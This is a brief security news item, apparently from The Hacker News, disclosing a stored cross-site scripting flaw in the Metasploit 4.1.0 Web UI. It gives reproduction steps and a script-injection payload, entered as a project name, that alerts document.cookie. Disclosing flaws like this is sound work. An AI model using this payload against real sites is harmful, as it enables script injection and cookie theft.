Metasploit 4.1.0 Web UI Cross Site Scripting vulnerability
The Hacker News
The Web UI in Metasploit version 4.1.0 suffers from a stored cross site scripting vulnerability discovered by "Stefan Schurtz".

Technical Details
Login to Web UI -> Create New Project -> Project name -> '"</script><script>alert(document.cookie)</script>

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.